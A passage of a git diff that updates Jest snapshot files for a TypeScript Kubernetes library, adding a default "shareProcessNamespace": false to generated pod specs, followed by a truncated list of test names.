"setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/deployment.test.ts.snap b/test/__snapshots__/deployment.test.ts.snap index 4a656e0c..8979adee 100644 --- a/test/__snapshots__/deployment.test.ts.snap +++ b/test/__snapshots__/deployment.test.ts.snap @@ -74,6 +74,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -194,6 +195,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -293,6 +295,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -402,6 +405,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -495,6 +499,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -586,6 +591,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -676,6 +682,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -747,6 +754,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -830,6 +838,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -901,6 +910,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -981,6 +991,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1074,6 +1085,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1164,6 +1176,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1235,6 +1248,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1318,6 +1332,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1389,6 +1404,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1469,6 +1485,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1562,6 +1579,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1652,6 +1670,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1740,6 +1759,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1825,6 +1845,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1877,6 +1898,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { @@ -2000,6 +2022,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap index c4a24c10..5381f2a1 100644 --- a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap +++ b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap @@ -62,6 +62,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -177,6 +178,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -305,6 +307,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -433,6 +436,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -561,6 +565,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -688,6 +693,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -815,6 +821,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -942,6 +949,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1069,6 +1077,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1196,6 +1205,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1323,6 +1333,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1450,6 +1461,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1578,6 +1590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1710,6 +1723,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1844,6 +1858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2012,6 +2027,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2146,6 +2162,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2266,6 +2283,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2394,6 +2412,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2509,6 +2528,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2633,6 +2653,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2754,6 +2775,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2869,6 +2891,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2990,6 +3013,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/job.test.ts.snap b/test/__snapshots__/job.test.ts.snap index 5aca1007..106074f8 100644 --- a/test/__snapshots__/job.test.ts.snap +++ b/test/__snapshots__/job.test.ts.snap @@ -48,6 +48,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/network-policy.test.ts.snap b/test/__snapshots__/network-policy.test.ts.snap index 514e47f9..470cf8bd 100644 --- a/test/__snapshots__/network-policy.test.ts.snap +++ b/test/__snapshots__/network-policy.test.ts.snap @@ -136,6 +136,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -181,6 +182,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -267,6 +269,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -331,6 +334,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -419,6 +423,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -502,6 +507,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -584,6 +590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -671,6 +678,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -766,6 +774,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -857,6 +866,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -962,6 +972,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1048,6 +1059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1135,6 +1147,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1180,6 +1193,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1266,6 +1280,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1330,6 +1345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1418,6 +1434,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1501,6 +1518,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1583,6 +1601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1670,6 +1689,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1765,6 +1785,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1856,6 +1877,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1961,6 +1983,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2047,6 +2070,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2134,6 +2158,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2217,6 +2242,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/pod.test.ts.snap b/test/__snapshots__/pod.test.ts.snap index 137d7e68..3b173625 100644 --- a/test/__snapshots__/pod.test.ts.snap +++ b/test/__snapshots__/pod.test.ts.snap @@ -44,6 +44,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -99,6 +100,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -173,6 +175,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -291,6 +294,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -341,6 +345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -417,6 +422,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -467,6 +473,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -543,6 +550,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -593,6 +601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -721,6 +730,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -771,6 +781,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -847,6 +858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -897,6 +909,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -973,6 +986,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1023,6 +1037,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1127,6 +1142,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1206,6 +1222,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1324,6 +1341,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1431,6 +1449,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1481,6 +1500,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1607,6 +1627,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1659,6 +1680,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1828,6 +1850,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1873,6 +1896,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1923,6 +1947,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2034,6 +2059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2154,6 +2180,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2204,6 +2231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2366,6 +2394,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2478,6 +2507,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2582,6 +2612,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2661,6 +2692,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2779,6 +2811,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2896,6 +2929,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2946,6 +2980,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3072,6 +3107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3124,6 +3160,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3293,6 +3330,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3338,6 +3376,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3388,6 +3427,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3499,6 +3539,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3619,6 +3660,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3669,6 +3711,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3831,6 +3874,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3943,6 +3987,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4011,6 +4056,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4061,6 +4107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4155,6 +4202,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4257,6 +4305,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4351,6 +4400,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4440,6 +4490,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4490,6 +4541,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4598,6 +4650,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4760,6 +4813,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4811,6 +4865,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4881,6 +4936,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4950,6 +5006,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5000,6 +5057,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5062,6 +5120,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5112,6 +5171,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5171,6 +5231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5238,6 +5299,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5303,6 +5365,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5353,6 +5416,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5415,6 +5479,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5465,6 +5530,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5524,6 +5590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5591,6 +5658,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5663,6 +5731,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5713,6 +5782,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { diff --git a/test/__snapshots__/service.test.ts.snap b/test/__snapshots__/service.test.ts.snap index 51c9d49f..d27cc7bd 100644 --- a/test/__snapshots__/service.test.ts.snap +++ b/test/__snapshots__/service.test.ts.snap @@ -95,6 +95,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/statefulset.test.ts.snap b/test/__snapshots__/statefulset.test.ts.snap index 86d6f7b3..92e3117c 100644 --- a/test/__snapshots__/statefulset.test.ts.snap +++ b/test/__snapshots__/statefulset.test.ts.snap @@ -76,6 +76,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -197,6 +198,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, },
[ "Can be isolated", "default configuration", "custom configuration", "StatefulSet gets defaults", "Can be exposed as via ingress", "exposing via a service preserves deployment namespace", "expose captures all container ports", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "can select a deployment", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Instantiation properties are all 